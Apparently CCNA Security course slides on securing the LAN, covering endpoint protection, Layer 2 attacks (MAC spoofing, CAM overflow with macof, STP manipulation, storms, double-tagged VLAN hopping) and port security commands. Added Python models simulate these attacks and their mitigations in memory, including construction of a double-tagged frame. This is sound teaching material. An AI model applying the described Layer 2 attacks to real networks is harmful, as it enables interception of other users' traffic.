CCNA Security
Chapter Six
Securing the Local Area Network

Lesson Planning
• This lesson should take 3-4 hours to present
• The lesson should include lecture, demonstrations, discussions and assessments
• The lesson can be taught in person or using remote instruction

Major Concepts
• Describe endpoint vulnerabilities and protection methods
• Describe basic Catalyst switch vulnerabilities
• Configure and verify switch security features, including port security and storm control
• Describe the fundamental security considerations of Wireless, VoIP, and SANs

Lesson Objectives
Upon completion of this lesson, the successful participant will be able to:
1. Describe endpoint security and the enabling technologies
2. Describe how Cisco IronPort is used to ensure endpoint security
3. Describe how Cisco NAC products are used to ensure endpoint security
4. Describe how the Cisco Security Agent is used to ensure endpoint security
5. Describe the primary considerations for securing the Layer 2 infrastructure
6. Describe MAC address spoofing attacks and MAC address spoofing attack mitigation

Lesson Objectives
7. Describe MAC address table overflow attacks and MAC address table overflow attack mitigation
8. Describe STP manipulation attacks and STP manipulation attack mitigation
9. Describe LAN storm attacks and LAN storm attack mitigation
10. Describe VLAN attacks and VLAN attack mitigation
11. Describe how to configure port security
12. Describe how to verify port security
13. Describe how to configure and verify BPDU Guard and Root Guard
14. Describe how to configure and verify storm control
15. Describe and configure Cisco SPAN
16.

Lesson Objectives
17. Describe the best practices for Layer 2 security
18. Describe the fundamental aspects of enterprise security for advanced technologies
19. Describe the fundamental aspects of wireless security and the enabling technologies
20. Describe wireless security solutions
21. Describe the fundamental aspects of VoIP security and the enabling technologies (Reference: CIAG course on VoIP security)
22. Describe VoIP security solutions
23. Describe the fundamental aspects of SAN security and the enabling technologies
24.

Securing the LAN
[Figure: network diagram with the Internet, a perimeter firewall, IPS, MARS, VPN, ACS, IronPort, web server, e-mail server, DNS and LAN hosts]
Areas of concentration:
• Securing endpoints
• Securing network infrastructure

Addressing Endpoint Security
[Figure: secure host supported by threat protection, policy compliance and infection containment]
Based on three elements:
• Cisco Network Admission Control (NAC)
• Endpoint protection
• Infection containment

Operating Systems Basic Security Services
• Trusted code and trusted path – ensures that the integrity of the operating system is not violated
• Privileged context of execution – provides identity authentication and certain privileges based on the identity
• Process memory protection and isolation – provides separation from other users and their data
• Access control to resources – ensures confidentiality and integrity of data

Types of Application Attacks
[Figure: direct and indirect application attacks]
Direct: "I have gained direct access to this application's privileges."
Indirect: "I have gained access to this system which is trusted by the other system, allowing me to access it."

Cisco Systems Endpoint Security Solutions
• Cisco NAC
• IronPort
• Cisco Security Agent

Cisco IronPort Products
IronPort products include:
• E-mail security appliances for virus and spam control
• Web security appliance for spyware filtering, URL filtering, and anti-malware
• Security management appliance

IronPort C-Series
[Figure: e-mail path before and after the IronPort E-mail Security Appliance. Before IronPort: separate firewall, antispam, antivirus, policy enforcement and mail routing stages sit between the Internet and the groupware and users. After IronPort: the firewall and a single IronPort appliance (MTA, encryption platform, DLP scanner, DLP policy manager) sit between the Internet and the groupware and users]

IronPort S-Series
[Figure: web path before and after the IronPort S-Series. Before IronPort: separate web proxy, antispyware, antivirus, antiphishing, URL filtering and policy management stages sit between the users, the firewall and the Internet. After IronPort: a single IronPort S-Series appliance sits between the users, the firewall and the Internet]

Cisco NAC
NAC Framework
• Software module embedded within NAC-enabled products
• Integrated framework leveraging multiple Cisco and NAC-aware vendor products
Cisco NAC Appliance
• In-band Cisco NAC Appliance solution can be used on any switch or router platform
• Self-contained, turnkey solution
The purpose of NAC:
• Allow only authorized and compliant systems to access the network
• To enforce network security policy

The NAC Framework
[Figure: hosts attempting network access, network access devices (enforcement), policy server decision points and remediation, and vendor servers. The Cisco Trust Agent on the host sends credentials over EAP/UDP or EAP/802.1x to the network access device, which relays them over RADIUS to the AAA server; the AAA server checks with vendor servers over HTTPS, answers "Comply?", and returns access rights and a notification]

NAC Components
• Cisco NAS – Serves as an in-band or out-of-band device for network access control
• Cisco NAM – Centralizes management for administrators, support personnel, and operators
• Cisco NAA – Optional lightweight client for device-based registry scans in unmanaged environments
• Rule-set updates – Scheduled automatic updates for antivirus, critical hotfixes, and other applications

Cisco NAC Appliance Process
[Figure: host, Cisco NAS, Cisco NAM, authentication server, quarantine role and the intranet/network (THE GOAL)]
1. Host attempts to access a web page or uses an optional client. Network access is blocked until the wired or wireless host provides login information.
2. Host is redirected to a login page. Cisco NAC Appliance validates username and password, and also performs device and network scans to assess vulnerabilities on the device.
3. The host is authenticated and optionally scanned for posture compliance.
3a. Device is noncompliant or login is incorrect. Host is denied access and assigned to a quarantine role with access to online remediation resources.
3b. Device is "clean". Machine gets on the "certified devices list" and is granted access to the network.
4. Access windows: login screen; scan is performed (types of checks depend on user role); if the scan fails, remediate.

CSA Architecture
[Figure: Management Center for Cisco Security Agent with an internal or external database, an administration workstation and the security policy; it communicates over SSL with servers protected by Cisco Security Agent, which send events and alerts back]

CSA Overview
[Figure: an application's requests pass through the file system, network, configuration and execution space interceptors; the rules engine and correlation engine apply state, rules and policies and return an allowed or blocked request]

CSA Functionality
Security Application        Network       File System   Configuration   Execution Space
                            Interceptor   Interceptor   Interceptor     Interceptor
Distributed Firewall        X             ―             ―               ―
Host Intrusion Prevention   X             ―             ―               X
Application Sandbox         ―             X             X               X
Network Worm Prevention     X             ―             ―               X
File Integrity Monitor

Attack Phases
[Figure: server protected by Cisco Security Agent, with its file system interceptor, network interceptor, configuration interceptor and execution space interceptor]
– Probe phase
  • Ping scans
  • Port scans
– Penetrate phase
  • Transfer exploit code to target
– Persist phase
  • Install new code
  • Modify configuration
– Propagate phase
  • Attack other targets
– Paralyze phase
  • Erase files
  • Crash system
  • Steal data

CSA Log Messages
[Figure: network diagram with the Internet, a perimeter firewall, IPS, MARS, VPN, ACS, IronPort, web server, e-mail server, DNS and hosts]

Layer 2 Security
When it comes to networking, Layer 2 is often a very weak link.
[Figure: OSI model with what each layer carries: Application – application stream; Transport – protocols and ports; Network – IP addresses; Data Link – MAC addresses; Physical – physical links. An initial compromise at the Data Link layer is shown with every layer above it marked as compromised]

MAC Address Spoofing Attack
[Figure: a host with MAC address AABBcc on switch Port 1 and the attacker with MAC address 12AbDd on Port 2; the switch's MAC address table maps Port 1 to AABBcc and Port 2 to 12AbDd]
Switch: "I have associated Ports 1 and 2 with the MAC addresses of the devices attached. Traffic destined for each device will be forwarded directly."
The switch keeps track of the endpoints by maintaining a MAC address table. In MAC spoofing, the attacker poses as another host—in this case, AABBcc.

MAC Address Spoofing Attack
[Figure: the attacker on Port 2 now also presents MAC address AABBcc; the switch's MAC address table entry for AABBcc moves from Port 1 to Port 2]
Attacker: "I have changed the MAC address on my computer to match the server."
Switch: "The device with MAC address AABBcc has changed locations to Port 2. I must adjust my MAC address table accordingly."

MAC Address Table Overflow Attack
[Figure: switch with PC1 and PC2 attached; the MAC address table holds the port-to-MAC-address mapping for each PC]
The switch can forward frames between PC1 and PC2 without flooding because the MAC address table contains port-to-MAC-address mappings for these PCs.

MAC Address Table Overflow Attack
[Figure: hosts A, B, C and D in VLAN 10; the intruder is on port 3/25; the MAC address table fills with entries X 3/25, Y 3/25, C 3/25 and the switch floods frames for X, Y and Z]
1. Intruder runs macof to begin sending unknown bogus MAC addresses.
2. Bogus addresses are added to the CAM table. CAM table is full.
3. The switch floods the frames.
4. Attacker sees traffic to servers B and D.
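To make steps 2 through 4 concrete from the switch's side, here is an added example (not code from the original slides) that models a CAM table with a fixed capacity and shows the forwarding decision before and after the table fills. It also shows why a per-port cap on learned addresses, which is what port security's maximum enforces, stops one port from filling the whole table. The capacity, the MAC addresses and the port names other than the slide's 3/25 are constructed.

```python
"""Model of a switch MAC address (CAM) table with a fixed capacity.

Added example, not from the original slides. It shows why a full CAM table
turns the switch into a hub for that VLAN: the real hosts can no longer be
learned, so unicast frames to them are flooded out every port and a station on
another port receives traffic never meant for it. It also shows that a per-port
cap on learned addresses (what port security's maximum enforces) keeps one port
from filling the whole table. MAC addresses and the capacity are constructed;
port 3/25 is the intruder's port as on the slide.
"""
from typing import Dict, Optional, Set

MAC_B = "0000.0000.000b"          # constructed address for server B
MAC_D = "0000.0000.000d"          # constructed address for server D
PORT_ATTACKER, PORT_B, PORT_D = "3/25", "3/26", "3/27"


class CamTable:
    """Port-to-MAC learning table. When full it simply stops learning new
    addresses, which is the behaviour the overflow attack relies on."""

    def __init__(self, capacity: int, ports: Set[str],
                 max_per_port: Optional[int] = None) -> None:
        self.capacity = capacity
        self.ports = set(ports)
        self.max_per_port = max_per_port        # None = no port security
        self.entries: Dict[str, str] = {}       # mac -> port
        self.refused: Dict[str, int] = {}       # port -> learns refused by the cap

    def learned_on(self, port: str) -> int:
        return sum(1 for p in self.entries.values() if p == port)

    def learn(self, mac: str, port: str) -> bool:
        """Learn (or refresh) a source MAC; return False if it was not stored."""
        if mac in self.entries:
            self.entries[mac] = port            # known station, possibly moved
            return True
        if self.max_per_port is not None and self.learned_on(port) >= self.max_per_port:
            self.refused[port] = self.refused.get(port, 0) + 1
            return False
        if len(self.entries) >= self.capacity:
            return False                        # table full: cannot learn
        self.entries[mac] = port
        return True

    def forward(self, src_mac: str, dst_mac: str, in_port: str) -> Set[str]:
        """Learn the source, then pick egress ports: known unicast goes to one
        port, unknown unicast is flooded to every other port in the VLAN."""
        self.learn(src_mac, in_port)
        out = self.entries.get(dst_mac)
        if out is None:
            return self.ports - {in_port}
        return set() if out == in_port else {out}


def overflow_scenario(bogus_count: int, capacity: int = 8,
                      max_per_port: Optional[int] = None) -> Dict[str, object]:
    """The intruder's port injects `bogus_count` source MACs, then B and D
    exchange frames. Returns the table size and where D's reply to B went."""
    cam = CamTable(capacity, {PORT_ATTACKER, PORT_B, PORT_D}, max_per_port)
    for i in range(bogus_count):
        cam.learn(f"0200.0000.{i:04x}", PORT_ATTACKER)    # constructed bogus MACs
    cam.forward(MAC_B, MAC_D, PORT_B)          # B -> D: D unknown yet, floods (normal)
    reply = cam.forward(MAC_D, MAC_B, PORT_D)  # D -> B: should reach only PORT_B
    return {"entries": len(cam.entries),
            "reply_ports": reply,
            "attacker_sees_reply": PORT_ATTACKER in reply,
            "refused_on_attacker_port": cam.refused.get(PORT_ATTACKER, 0)}


if __name__ == "__main__":
    for label, kwargs in [("no attack", {"bogus_count": 0}),
                          ("CAM overflow", {"bogus_count": 100}),
                          ("overflow, max 1 per port", {"bogus_count": 100, "max_per_port": 1})]:
        print(f"{label:26s} {overflow_scenario(**kwargs)}")
```

With the table full, D's reply to B is flooded out 3/25 as well as 3/26, which is exactly the traffic the slide says the attacker sees; with one secure address allowed per port the intruder's extra addresses are refused and the reply goes only to B.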

STP Manipulation Attack
• Spanning tree protocol operates by electing a root bridge
• STP builds a tree topology
• STP manipulation changes the topology of a network—the attacking host appears to be the root bridge
[Figure: switched topology with forwarding (F) and blocking (B) ports; root bridge priority = 8192, MAC address = 0000.00C0.1234]

STP Manipulation Attack
[Figure: the attacker, connected to two switches, is now the root bridge; the original root bridge (priority = 8192) is no longer root and the forwarding (F) and blocking (B) port states have changed]
The attacking host broadcasts out STP configuration and topology change BPDUs. This is an attempt to force spanning tree recalculations.
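The following added example (not from the original slides) models the root election the two slides describe and the two mitigations the lesson objectives name for it, BPDU Guard and Root Guard. Bridge IDs are compared as (priority, MAC) with the lowest winning, so a superior BPDU from a host wins the election unless the receiving port is guarded. The port names, the attacker's bridge ID and the local switch's bridge ID are constructed; the root bridge values (priority 8192, MAC 0000.00C0.1234) are the slide's.

```python
"""Model of STP root election plus the two guards that stop a rogue bridge
from taking over the topology. Added example, not from the original slides;
all bridge IDs except the slide's root (8192, 0000.00C0.1234) and all port
names are constructed.

- Root election: the lowest bridge ID (priority, then MAC) wins, so a host
  sending BPDUs with a priority below the real root's becomes root.
- BPDU Guard: an access (PortFast) port should never see a BPDU; receiving one
  puts the port into err-disabled.
- Root Guard: a port that may carry BPDUs but must never lead toward the root
  goes root-inconsistent when it receives a superior BPDU.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

BridgeId = Tuple[int, str]   # (priority, MAC); tuple comparison = lower wins


@dataclass
class Bpdu:
    root_id: BridgeId
    sender_id: BridgeId


@dataclass
class SwitchPort:
    name: str
    bpdu_guard: bool = False     # configured on access/PortFast ports
    root_guard: bool = False     # configured on designated ports facing other switches
    state: str = "forwarding"


@dataclass
class Switch:
    bridge_id: BridgeId
    ports: Dict[str, SwitchPort]
    root_id: BridgeId = field(init=False)
    log: List[str] = field(default_factory=list)

    def __post_init__(self) -> None:
        self.root_id = self.bridge_id   # every bridge starts out believing it is root

    def receive_bpdu(self, port_name: str, bpdu: Bpdu) -> str:
        """Process one BPDU on a port and return the port's resulting state."""
        port = self.ports[port_name]
        if port.bpdu_guard:
            port.state = "err-disabled"
            self.log.append(f"{port_name}: BPDU Guard triggered, port err-disabled")
            return port.state
        superior = bpdu.root_id < self.root_id
        if superior and port.root_guard:
            port.state = "root-inconsistent"
            self.log.append(f"{port_name}: Root Guard blocked superior BPDU "
                            f"claiming root {bpdu.root_id}")
            return port.state
        if superior:
            self.root_id = bpdu.root_id   # new root accepted; topology recalculates
            self.log.append(f"{port_name}: new root bridge {bpdu.root_id}")
        return port.state


def build_switch() -> Switch:
    """Constructed non-root switch: an uplink toward the slide's root bridge, a
    user access port with BPDU Guard, and a downlink with Root Guard."""
    sw = Switch(bridge_id=(32768, "0000.00C0.ABCD"),
                ports={"Gi0/1": SwitchPort("Gi0/1"),
                       "Fa0/5": SwitchPort("Fa0/5", bpdu_guard=True),
                       "Gi0/2": SwitchPort("Gi0/2", root_guard=True)})
    real_root: BridgeId = (8192, "0000.00C0.1234")
    sw.receive_bpdu("Gi0/1", Bpdu(root_id=real_root, sender_id=real_root))
    return sw


def rogue_bpdu_results() -> Dict[str, Tuple[str, BridgeId]]:
    """Deliver the same superior BPDU (priority 0) into each kind of port and
    record the port state and who the switch then believes is root."""
    rogue: BridgeId = (0, "0000.00C0.9999")        # constructed attacker bridge ID
    bpdu = Bpdu(root_id=rogue, sender_id=rogue)
    results = {}
    for port_name in ("Fa0/5", "Gi0/2", "Gi0/1"):
        sw = build_switch()
        state = sw.receive_bpdu(port_name, bpdu)
        results[port_name] = (state, sw.root_id)
    return results


if __name__ == "__main__":
    for port, (state, root) in rogue_bpdu_results().items():
        print(f"{port}: port state {state}, root bridge now {root}")
```

Only the unguarded uplink accepts the new root; the BPDU Guard port is err-disabled and the Root Guard port goes root-inconsistent while the switch keeps the slide's root bridge.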

LAN Storm Attack
• Broadcast, multicast, or unicast packets are flooded on all ports in the same VLAN.
• These storms can increase the CPU utilization on a switch to 100%, reducing the performance of the network.
[Figure: broadcast frames replicated out of every switch port]

Storm Control
[Figure: total number of broadcast packets or bytes per interval plotted over time]
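Storm control works on the quantity the figure plots: the switch counts broadcast (or multicast or unicast) traffic per one-second interval and compares it with a threshold. The added example below (not from the original slides) models that comparison with a rising and a falling threshold and shows why the falling threshold matters: without it, traffic hovering around the limit makes the port flap between suppressing and forwarding. The thresholds and the traffic traces are constructed.

```python
"""Model of per-port storm control with rising and falling thresholds.
Added example, not from the original slides; the thresholds and the per-second
traffic traces are constructed. The switch counts broadcast (or multicast or
unicast) traffic per one-second interval; once the level exceeds the rising
threshold it suppresses that traffic type on the port until a later interval
drops below the falling threshold.
"""
from typing import List, Optional, Tuple


class StormControl:
    """One traffic class on one port. Levels are percent of port bandwidth;
    the same logic applies to packets-per-second thresholds."""

    def __init__(self, rising: float, falling: Optional[float] = None) -> None:
        # With no falling threshold configured the two are equal.
        self.rising = rising
        self.falling = rising if falling is None else falling
        self.suppressing = False
        self.transitions = 0
        self.events: List[str] = []

    def interval(self, second: int, level: float) -> bool:
        """Feed one interval's level; return whether traffic is now suppressed."""
        if not self.suppressing and level > self.rising:
            self.suppressing = True
            self.transitions += 1
            self.events.append(f"t={second}s level {level}% > rising {self.rising}%: "
                               f"storm detected, suppressing")
        elif self.suppressing and level < self.falling:
            self.suppressing = False
            self.transitions += 1
            self.events.append(f"t={second}s level {level}% < falling {self.falling}%: "
                               f"storm over, forwarding again")
        return self.suppressing


def run_trace(trace: List[float], rising: float,
              falling: Optional[float] = None) -> Tuple[List[bool], int]:
    """Apply storm control to a trace; return per-second suppression state and
    the number of on/off transitions (flapping) it produced."""
    sc = StormControl(rising, falling)
    states = [sc.interval(t, level) for t, level in enumerate(trace)]
    return states, sc.transitions


# Constructed trace: normal background, a broadcast storm, then it dies down.
STORM_TRACE = [5, 10, 60, 80, 40, 30, 10, 5]
# Constructed trace that hovers around the threshold.
FLAPPING_TRACE = [55, 45, 55, 45, 55, 45]

if __name__ == "__main__":
    print(run_trace(STORM_TRACE, rising=50, falling=20))
    print(run_trace(FLAPPING_TRACE, rising=50))              # no hysteresis: flaps
    print(run_trace(FLAPPING_TRACE, rising=50, falling=30))  # hysteresis: stays suppressed
```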

VLAN Attacks
VLAN = Broadcast Domain = Logical Network (Subnet)
[Figure: VLANs provide segmentation, flexibility and security]

VLAN Attacks
[Figure: attacker connected to a switch over an 802.1Q trunk sees traffic destined for the servers in VLAN 10 and VLAN 20]
A VLAN hopping attack can be launched in two ways:
• Spoofing DTP messages from the attacking host to cause the switch to enter trunking mode
•

Double-Tagging VLAN Attack
[Figure: attacker on VLAN 10, two switches joined by an 802.1Q trunk with native VLAN = 10, victim on VLAN 20]
1. Attacker on VLAN 10, but puts a 20 tag in the packet.
2. The first switch strips off the first tag and does not retag it (native traffic is not retagged). It then forwards the packet to switch 2.
3. The second switch receives the packet on the native VLAN.
4. The second switch examines the packet, sees the VLAN 20 tag and forwards it.
Note: This attack works only if the trunk has the same native VLAN as the attacker.
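The note above states the condition the attack depends on. The added example below (not from the original slides) follows one double-tagged frame through the two switches' tag handling and shows that changing that condition, either by moving the trunk's native VLAN away from any access VLAN or by tagging the native VLAN, leaves the frame in the attacker's own VLAN. It also includes a check a monitoring tool can apply on access ports, since a frame carrying two 802.1Q tags from a host is never legitimate. The frame contents and VLAN 999 are constructed; VLANs 10 and 20 are the slide's.

```python
"""Model of 802.1Q tag handling on the two switches of the double-tagging
slide. Added example, not from the original slides; the frame bytes and the
unused VLAN 999 are constructed, VLANs 10 and 20 come from the slide.
"""
import struct
from typing import List, Tuple

TPID = 0x8100       # 802.1Q tag protocol identifier
ETH_IPV4 = 0x0800


def build_frame(dst: bytes, src: bytes, vlans: List[int], payload: bytes) -> bytes:
    """Construct an Ethernet frame with zero or more 802.1Q tags, outermost first."""
    tags = b"".join(struct.pack("!HH", TPID, vid & 0x0FFF) for vid in vlans)
    return dst + src + tags + struct.pack("!H", ETH_IPV4) + payload


def split_tags(frame: bytes) -> Tuple[List[int], bytes]:
    """Return the VLAN IDs of all leading 802.1Q tags and the frame without them."""
    header, rest = frame[:12], frame[12:]
    vlans: List[int] = []
    while len(rest) >= 4 and struct.unpack("!H", rest[:2])[0] == TPID:
        vlans.append(struct.unpack("!H", rest[2:4])[0] & 0x0FFF)
        rest = rest[4:]
    return vlans, header + rest


def strip_outer_tag(frame: bytes) -> bytes:
    return frame[:12] + frame[16:]


def add_outer_tag(frame: bytes, vid: int) -> bytes:
    return frame[:12] + struct.pack("!HH", TPID, vid) + frame[12:]


def access_ingress(frame: bytes, access_vlan: int) -> Tuple[int, bytes]:
    """Switch 1, access port: the frame belongs to the access VLAN. A tag that
    matches the access VLAN is removed; whatever follows is treated as payload."""
    vlans, _ = split_tags(frame)
    if vlans and vlans[0] == access_vlan:
        frame = strip_outer_tag(frame)
    return access_vlan, frame


def trunk_egress(vlan: int, frame: bytes, native_vlan: int, tag_native: bool) -> bytes:
    """Switch 1, trunk port: tag the frame with its VLAN unless it is the native
    VLAN and native tagging is off (the slide's 'native traffic is not retagged')."""
    if vlan == native_vlan and not tag_native:
        return frame
    return add_outer_tag(frame, vlan)


def trunk_ingress(frame: bytes, native_vlan: int) -> int:
    """Switch 2, trunk port: the VLAN is the outer tag if present, else native."""
    vlans, _ = split_tags(frame)
    return vlans[0] if vlans else native_vlan


def delivered_vlan(attacker_vlan: int, target_vlan: int,
                   native_vlan: int, tag_native: bool = False) -> int:
    """Follow one double-tagged frame from the attacker's access port to
    switch 2 and return the VLAN switch 2 places it in."""
    frame = build_frame(b"\xff" * 6, b"\x02\x00\x00\x00\x00\x01",   # constructed
                        [attacker_vlan, target_vlan], b"constructed payload")
    vlan, frame = access_ingress(frame, attacker_vlan)
    frame = trunk_egress(vlan, frame, native_vlan, tag_native)
    return trunk_ingress(frame, native_vlan)


def is_double_tagged(frame: bytes) -> bool:
    """Detection check for frames seen on an access port: more than one
    802.1Q tag from a host is not legitimate and is worth alerting on."""
    return len(split_tags(frame)[0]) > 1


if __name__ == "__main__":
    print("native VLAN 10, untagged  ->", delivered_vlan(10, 20, native_vlan=10))
    print("native VLAN 999, untagged ->", delivered_vlan(10, 20, native_vlan=999))
    print("native VLAN 10, tagged    ->", delivered_vlan(10, 20, native_vlan=10, tag_native=True))
```

Only the first case lands the frame in VLAN 20; with an unused native VLAN or with `tag_native`, switch 1 puts the VLAN 10 tag back on and switch 2 keeps the frame in VLAN 10.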

Port Security Overview
[Figure: switch ports 0/1, 0/2 and 0/3 with hosts MAC A, MAC B and MAC C; Attacker 1 and Attacker 2 present MAC F and a duplicate MAC A. Port 0/1 allows MAC A, Port 0/2 allows MAC B, Port 0/3 allows MAC C]
Allows an administrator to statically specify MAC addresses for a port or to permit the switch to dynamically learn a limited number of MAC addresses.

CLI Commands
Switch(config-if)# switchport mode access
• Sets the interface mode as access
Switch(config-if)# switchport port-security
• Enables port security on the interface
Switch(config-if)# switchport port-security maximum value
• Sets the maximum number of secure MAC addresses for the interface (optional)

Switchport Port-Security Parameters
Parameter: mac-address mac-address
Description: (Optional) Specify a secure MAC address for the port by entering a 48-bit MAC address. You can add additional secure MAC addresses up to the maximum value configured.

Parameter: vlan vlan-id
Description: (Optional) On a trunk port only, specify the VLAN ID and the MAC address. If no VLAN ID is specified, the native VLAN is used.

Parameter: vlan access
Description: (Optional) On an access port only, specify the VLAN as an access VLAN.

Parameter: vlan voice
Description: (Optional) On an access port only, specify the VLAN as a voice VLAN.

Parameter: mac-address sticky [mac-address]
Description: (Optional) Enable the interface for sticky learning by entering only the mac-address sticky keywords. When sticky learning is enabled, the interface adds all secure MAC addresses that are dynamically learned to the running configuration and converts these addresses to sticky secure MAC addresses. Specify a sticky secure MAC address by entering the mac-address sticky mac-address keywords.

Parameter: maximum value
Description: (Optional) Set the maximum number of secure MAC addresses for the interface. The maximum number of secure MAC addresses that you can configure on a switch is set by the maximum number of available MAC addresses allowed in the system. The active Switch Database Management (SDM) template determines this number. This number represents the total of available MAC addresses, including those used for other Layer 2 functions and any other secure MAC addresses configured on interfaces. The default setting is 1.

Parameter: vlan [vlan-list]
Description: (Optional) For trunk ports, you can set the maximum number of secure MAC addresses on a VLAN. If the vlan keyword is not entered, the default value is used.
  • vlan: set a per-VLAN maximum value.
  • vlan vlan-list: set a per-VLAN maximum value on a range of VLANs separated by a hyphen or a series of VLANs separated by commas. For

Port Security Violation Configuration
Switch(config-if)# switchport port-security mac-address sticky
• Enables sticky learning on the interface (optional)
Switch(config-if)# switchport port-security violation {protect | restrict | shutdown}
• Sets the violation mode (optional)
Switch(config-if)# switchport port-security mac-address mac-address
• Enters a static secure MAC address for the interface (optional)

Switchport Port-Security Violation Parameters
Parameter: protect
Description: (Optional) Set the security violation protect mode. When the number of secure MAC addresses reaches the limit allowed on the port, packets with unknown source addresses are dropped until you remove a sufficient number of secure MAC addresses or increase the number of maximum allowable addresses. You are not notified that a security violation has occurred.

Parameter: restrict
Description: (Optional) Set the security violation restrict mode. When the number of secure MAC addresses reaches the limit allowed on the port, packets with unknown source addresses are dropped until you remove a sufficient number of secure MAC addresses or increase the number of maximum allowable addresses. In this mode, you are notified that a security violation has occurred.

Parameter: shutdown
Description: (Optional) Set the security violation shutdown mode. In this mode, a port security violation causes the interface to immediately become error-disabled and turns off the port LED. It also sends an SNMP trap, logs a syslog message, and increments the violation counter. When a secure port is in the error-disabled state, you can bring it out of this state by entering the errdisable recovery cause psecure-violation global configuration command, or you can manually re-enable it by entering the shutdown and no shutdown interface configuration commands.

Parameter: shutdown vlan
Description: Set the security violation mode to per-VLAN shutdown. In this mode, only the VLAN on which the violation occurred is error-disabled.

Port Security Aging Configuration
Switch(config-if)# switchport port-security aging {static | time time | type {absolute | inactivity}}
• Enables or disables static aging for the secure port or sets the aging time or type
• The aging command allows MAC addresses on the secure switchport to be deleted after the set aging time
• This helps to avoid a situation where obsolete MAC addresses occupy the table and saturate it, causing a violation when the maximum number is exceeded

Switchport Port-Security Aging Parameters
Parameter: static
Description: Enable aging for statically configured secure addresses on this port.

Parameter: time time
Description: Specify the aging time for this port. The range is 0 to 1440 minutes. If the time is 0, aging is disabled for this port.

Parameter: type absolute
Description: Set absolute aging type. All the secure addresses on this port age out exactly after the time (minutes) specified and are removed from the secure address list.

Parameter: type inactivity
Description: Set the inactivity aging type. The secure addresses on this port age out only if there is no data traffic from the secure source address for the specified time period.

Typical Configuration
[Figure: switch S2 with PC B attached]
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security maximum 2
Switch(config-if)# switchport port-security violation shutdown
Switch(config-if)# switchport port-security mac-address sticky
Switch(config-if)# switchport port-security aging time 120
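To show what the commands in this typical configuration do to a port over time, here is an added example (not code from the original slides) that models one secure access port: the maximum of 2 addresses, sticky learning, the three violation modes from the parameter table, and absolute aging at 120 minutes. The MAC addresses and the timeline are constructed; the syslog text is modelled on the IOS port-security violation message and should be treated as an assumption.

```python
"""Model of port security on one access port: maximum secure addresses,
sticky learning, the protect/restrict/shutdown violation modes, and aging.
Added example, not from the original slides; the configuration values mirror
the slide's typical configuration (maximum 2, violation shutdown, sticky,
aging time 120), while the MAC addresses and timestamps are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class SecurePort:
    name: str
    maximum: int = 1
    violation: str = "shutdown"          # protect | restrict | shutdown
    sticky: bool = False
    aging_time: int = 0                  # minutes; 0 = aging disabled
    aging_type: str = "absolute"         # absolute | inactivity
    aging_static: bool = False           # 'aging static' keyword
    static: Dict[str, int] = field(default_factory=dict)    # mac -> time configured
    dynamic: Dict[str, int] = field(default_factory=dict)   # mac -> time learned/refreshed
    status: str = "Secure-up"
    violation_count: int = 0
    syslog: List[str] = field(default_factory=list)
    running_config: List[str] = field(default_factory=list)

    def secure_addresses(self) -> Dict[str, int]:
        return {**self.static, **self.dynamic}

    def configure_static(self, mac: str, now: int = 0) -> None:
        self.static[mac] = now

    def frame_from(self, mac: str, now: int) -> str:
        """Ingress frame with source `mac` at minute `now`; returns the action
        taken: 'forward', 'drop' or 'err-disable'."""
        if self.status == "Secure-shutdown":
            return "drop"                     # err-disabled port passes nothing
        self._age_out(now)
        if mac in self.static:
            return "forward"
        if mac in self.dynamic:
            if self.aging_type == "inactivity":
                self.dynamic[mac] = now       # traffic refreshes the inactivity timer
            return "forward"
        if len(self.secure_addresses()) < self.maximum:
            self.dynamic[mac] = now
            if self.sticky:                   # sticky: learned address lands in running-config
                self.running_config.append(
                    f"switchport port-security mac-address sticky {mac}")
            return "forward"
        return self._violate(mac)

    def _violate(self, mac: str) -> str:
        if self.violation == "protect":
            return "drop"                     # silent: no counter, no log
        self.violation_count += 1
        # Message text modelled on the IOS PSECURE_VIOLATION syslog (assumption).
        self.syslog.append(f"%PORT_SECURITY-2-PSECURE_VIOLATION: Security violation "
                           f"occurred, caused by MAC address {mac} on port {self.name}.")
        if self.violation == "restrict":
            return "drop"
        self.status = "Secure-shutdown"       # err-disabled until recovery or shut/no shut
        return "err-disable"

    def _age_out(self, now: int) -> None:
        """Absolute aging removes entries `aging_time` minutes after they were
        learned; inactivity aging counts from the last refresh. Dynamic entries
        (sticky ones included, a modelling assumption) and, with 'aging static',
        static entries are subject to it."""
        if self.aging_time == 0:
            return
        for mac, t in list(self.dynamic.items()):
            if now - t >= self.aging_time:
                del self.dynamic[mac]
        if self.aging_static:
            for mac, t in list(self.static.items()):
                if now - t >= self.aging_time:
                    del self.static[mac]

    def recover(self) -> None:
        """errdisable recovery cause psecure-violation, or shutdown / no shutdown."""
        self.status = "Secure-up"


def scenario(violation: str) -> Dict[str, object]:
    """The slide's typical configuration with the given violation mode: PC A
    and PC B are learned, a third host appears, then both entries age out."""
    port = SecurePort("Fa0/12", maximum=2, violation=violation, sticky=True,
                      aging_time=120, aging_type="absolute")
    actions = [port.frame_from("0000.ffff.aaaa", 0),     # PC A learned (sticky)
               port.frame_from("0000.ffff.bbbb", 1),     # PC B learned (sticky)
               port.frame_from("0000.ffff.cccc", 2)]     # third host: violation
    status_after_violation = port.status
    actions.append(port.frame_from("0000.ffff.aaaa", 3))    # PC A while port may be down
    port.recover()                                           # errdisable recovery
    actions.append(port.frame_from("0000.ffff.aaaa", 125))  # both aged out; A relearned
    return {"actions": actions, "violations": port.violation_count,
            "syslog": len(port.syslog), "status_after_violation": status_after_violation,
            "secure_now": sorted(port.secure_addresses())}


if __name__ == "__main__":
    for mode in ("protect", "restrict", "shutdown"):
        print(mode, scenario(mode))
```

Running the three modes side by side shows the difference the parameter table describes: protect drops silently, restrict drops and logs, and shutdown err-disables the port so even PC A is dropped until the port is recovered.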

CLI Commands
sw-class# show port-security
Secure Port  MaxSecureAddr  CurrentAddr  SecurityViolation  Security Action
                (Count)       (Count)          (Count)
---------------------------------------------------------------------------
      Fa0/12              2            0                  0         Shutdown
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 0
Max Addresses limit in System (excluding one mac per port) : 1024

sw-class# show port-security interface f0/12
Port Security              : Enabled
Port status                : Secure-down
Violation mode             : Shutdown
Maximum MAC Addresses      : 2
Total MAC Addresses        : 1
Configured MAC Addresses   : 0
Aging time                 : 120 mins
Aging type                 : Absolute
SecureStatic address aging : Disabled
Security
View Secure MAC Addresses

sw-class# show port-security address
